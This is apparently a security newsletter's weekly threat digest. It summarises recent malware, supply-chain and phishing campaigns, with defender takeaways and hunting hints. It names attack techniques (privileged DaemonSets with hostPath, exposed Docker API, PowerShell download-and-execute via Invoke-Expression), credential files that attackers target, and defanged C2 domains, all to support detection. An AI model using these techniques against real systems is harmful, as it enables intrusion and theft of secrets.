EvilBit Threat Digest - Wipers in the Cluster, Thieves in the Toolchain

The theme this week isn't "new exploits" but "new places to hide old sins": Kubernetes as a delivery bus, update channels as a smuggling tunnel, and "trusted" platforms (GitHub, PyPI, Firebase) as the stage crew for the con.

Grab the flashlight. Let's walk.

Cloud-native malware stops pretending to be subtle

CanisterWorm gets teeth: a Kubernetes wiper with a passport stamp

TeamPCP's CanisterWorm isn't just "malware that runs in containers." It uses Kubernetes like it was designed for adversaries: schedule something once, and it shows up everywhere.

The standout twist: a geopolitically targeted destructive mode. If a node looks Iranian-locale configured, the wiper path kicks in, wiping nodes and forcing reboots. If it doesn't, the malware plays the long game: it installs persistent backdoors and keeps moving. That's a nasty dual-use posture: destroy one set of victims, quietly own the rest. Aikido Security: CanisterWorm Gets Teeth: TeamPCP's Kubernetes Wiper Targets Iran | Ars Technica: Self-propagating malware poisons open source software and wipes Iran-based machines | BleepingComputer: TeamPCP deploys Iran-targeted wiper in Kubernetes attacks | The Hacker News: Trivy Hack Spreads Infostealer via Docker, Triggers Worm and Kubernetes Wiper

Mechanically, the cluster-wide reach comes from DaemonSet abuse (think "run this privileged pod on every node"), paired with the kinds of shortcuts that still somehow exist in 2026:

• Stolen SSH keys for lateral movement
• Exposed Docker API on 2375 (no auth, no TLS, no hope)
• Subnet crawling like it's 2004 and you just installed nmap for the first time

Defender takeaway: Kubernetes isn't merely a target; it's an amplifier. If your environment lets privileged pods mount / via hostPath, you've basically given malware a skeleton key and a map.

Defender sanity check (hunt-level, not "generate me signatures"):

• Inventory kube-system for unexpected DaemonSets (Aikido calls out names like host-provisioner-iran / host-provisioner-std)
• On nodes, look for suspicious systemd services (e.g., pgmonitor, internal-monitor) and odd Python runners in /var/lib/*
• Treat 2375 exposure as an incident until proven otherwise Aikido Security: CanisterWorm Gets Teeth: TeamPCP's Kubernetes Wiper Targets Iran

Bucklog's Kubernetes scanning fleet: "internet background radiation" with a control plane

GreyNoise profiled a Kubernetes-orchestrated scanning fleet (AS211590, "Bucklog") running out of a French hosting provider that looks less like hobby scanning and more like a managed operation: systematic probing, credential harvesting patterns, and targeted exploitation of n8n, where CVE-2026-21858 gets the spotlight. Bucklog's Machine: Inside a Kubernetes Scanning Fleet

The detail that matters operationally: they're not just poking login pages. They're hunting high-value files (.env, .aws/credentials, .git/config) and probing for path traversal weaknesses against brittle WAF logic. GreyNoise also notes protocol fingerprinting (JA4H/JA4T) to cluster activity, useful when the attacker rotates infrastructure but can't stop being themselves. Bucklog's Machine: Inside a Kubernetes Scanning Fleet

Plain-English takeaway: if your edge is exposed, assume it's being profiled by actors who catalog first, exploit second. Patch n8n fast, and treat repeated "weirdly encoded traversal-ish paths" as early warning, not noise. Note that CVE-2025-68613 (another critical n8n RCE) is also in active exploitation separately; if you're running n8n, both CVEs need your attention.

Supply chain: still the easiest way into "trusted" environments

EmEditor update channel compromised: trust turned into code execution

Microsoft detailed a supply-chain compromise affecting EmEditor updates: malicious code injected into update packages via a WordPress compromise of EmEditor's download infrastructure. The payload used MSI custom actions to execute PowerShell (Invoke-RestMethod piped to Invoke-Expression), leading to infostealer and backdoor deployment with C2 communication across multiple domains. When Trust Becomes the Attack Vector: Analysis of the EmEditor Supply-Chain Compromise

Takeaway: treat "signed and updated" as necessary, not sufficient. Your detections should still notice when a newly updated app suddenly starts behaving like a downloader.

Hunting note: Microsoft's report names C2 domains including emeditorjp[.]com and emeditorde[.]com. If you have EmEditor deployed, check DNS and proxy logs for those indicators and look for MSI installs spawning PowerShell with IEX/Invoke-Expression patterns.

LiteLLM's PyPI package hijacked (TeamPCP again)

If the CanisterWorm story made you tired, here's your espresso shot: TeamPCP is also tied to a supply-chain hit on LiteLLM's PyPI package, turning a popular developer dependency into a credential-stealing delivery channel. TeamPCP Hijacks LiteLLM's PyPI Package: Credential Stealer Hits 40k-Star Project

Same pattern we keep watching: compromise the place developers already trust, then steal the secrets that let you compromise the next place. CI tokens, cloud creds, API keys. Too many secrets, all in one requirements.txt.

Defender note: if you don't have dependency pinning + provenance checks in your build pipeline, you're relying on vibes and the kindness of maintainers.

macOS and Android: the "secondary platforms" doing primary damage

UPDATE: ClickFix goes macOS; MioLab builds a stealer empire aimed at crypto

We've talked before about the ClickFix social-engineering pattern: pages that nudge users to copy/paste commands or "verify" something in a way that conveniently runs attacker code. This week's update: LevelBlue outlines MioLab, a macOS stealer operation targeting the cryptocurrency ecosystem, with ClickFix-style tradecraft in the mix. "Say My Name": How MioLab is building MacOS Stealer Empire

Fresh angle here: macOS stealers aren't just grabbing browser passwords anymore; the business model is tuned for crypto workflows. Wallet material, session tokens, and anything that turns "one compromised laptop" into "one drained treasury."

Practical takeaway: the control you want isn't "install fewer apps" (good luck). It's:

• tighter permission governance (especially around keychain and accessibility prompts),
• and aggressive egress + known-C2 blocking for endpoints that handle financial operations. "Say My Name": How MioLab is building MacOS Stealer Empire

GhostClaw/GhostLoader expands beyond npm: GitHub repos and AI workflows as delivery

Jamf's write-up on GhostClaw / GhostLoader is a reminder that "download code from GitHub" is now a malware installation method, not a developer habit. The campaign's delivery expands into GitHub repositories and AI workflows, with macOS infostealer behavior and concrete IOCs (including a C2 domain). GhostClaw expands beyond npm: GitHub repositories and AI workflows deliver macOS infostealer

When your workflows start auto-fetching artifacts and running helper scripts, "repo trust" becomes an execution boundary. There is no sandbox. There's just code that ran before you decided to trust it.

Android: fake ChatGPT invites + preinstalled firmware malware (two very different traps)

Two Android threads worth holding in your head at the same time:

1. A campaign pushing fake ChatGPT beta invitations, abusing Firebase App Distribution to look legitimate enough to slip past human suspicion. Fake ChatGPT Invitations Target Android Users In New Malware Campaign
2. Sophos reporting firmware-level malware pre-installed on some Android devices (Sophos calls it "Keenadu," embedded in libandroid_runtime.so), meaning compromise can exist below the OS layer you manage, persist across resets, and resist normal remediation. Affected manufacturers include BLU, DOOGEE, Ulefone, and Gigaset, among others. Android devices ship with firmware-level malware

Combined takeaway: Android risk isn't just "users install bad apps." It's also supply chain integrity: what you bought, where it was built, and whether your MDM/EDR even has a fighting chance at visibility.

ClayRat: a straightforward Android RAT with spyware behavior

ClayRat is another Android RAT/spyware entry in the "steal SMS, call logs, contacts, and remote control the device" hall of fame. It's not subtle, but it doesn't have to be; Android infection at scale often succeeds on distribution, not innovation. ClayRat: What was that?

Social engineering keeps winning (because it scales)

FAUX#ELEVATE: French "CV lure" chain that completes in ~25 seconds

Securonix's FAUX#ELEVATE report is a clean example of modern "speedrun malware": obfuscated French CV-themed VBScript, rapid staging, credential theft from browsers, file exfil, Monero mining, plus RAT capability, all finishing fast to beat human reaction time. Analyzing FAUX#ELEVATE: Threat Actors Target France with CV Lures to Deploy Crypto Miners and Infostealers

Two details worth watching for:

• The VBScript is reportedly 99%+ junk content: obfuscation tuned for "make static scanning expensive."
• Victim selection logic aims at domain-joined enterprise systems, because that's where the cookies taste better. Analyzing FAUX#ELEVATE: Threat Actors Target France with CV Lures to Deploy Crypto Miners and Infostealers

UPDATE: Tycoon2FA didn't stay dead after the takedown

Earlier this month we covered the Tycoon2FA disruption. CrowdStrike's update is the part nobody likes: the platform persists following takedown. Activity dropped to roughly 25% on the day of the Europol seizure, then poured back into shape within days. That resilience is the product now: kits that can lose infrastructure and keep selling "MFA bypass" via adversary-in-the-middle session theft. Tycoon2FA Phishing-as-a-Service Platform Persists Following Takedown

Takeaway: takedowns buy you time, not safety. The durable fix is still on the defender side: phishing-resistant auth (FIDO2/WebAuthn), conditional access that cares about device posture, and tightening session controls where your IdP supports it.

Advisory radar: patching without the comfort of a neat CVE list

NGINX Plus / Open Source advisory from Canada's CCCS + F5

Canada's CCCS and F5 put out an advisory for NGINX Plus R32 through R36 and NGINX Open Source versions across a wide range, covering CVE-2026-1642, CVE-2026-27654, and CVE-2026-32647. Fix versions: R36 P3, R35 P2, or R32 P5. NGINX is everywhere, and "everywhere" is a priority category. F5 security advisory (AV26-273) | K000160336: Out-of-band Security Notification

Plain-English takeaway: if you run NGINX at the edge and you're behind on updates, don't wait for drama, or a PoC, to tell you which side of probability you're on.

Closing: The control planes are the battleground

We used to talk about "the perimeter" like it was a wall. It's not. It's a set of control planes: clusters that schedule code, registries that deliver code, update channels that bless code, and identity systems that vouch for the humans running it.

This week's lesson is painfully consistent: if attackers can write to your control plane, they don't need a clever exploit. They just need you to do what you already do, at scale.

Eyes on the network. Claws ready.

- KryptoKat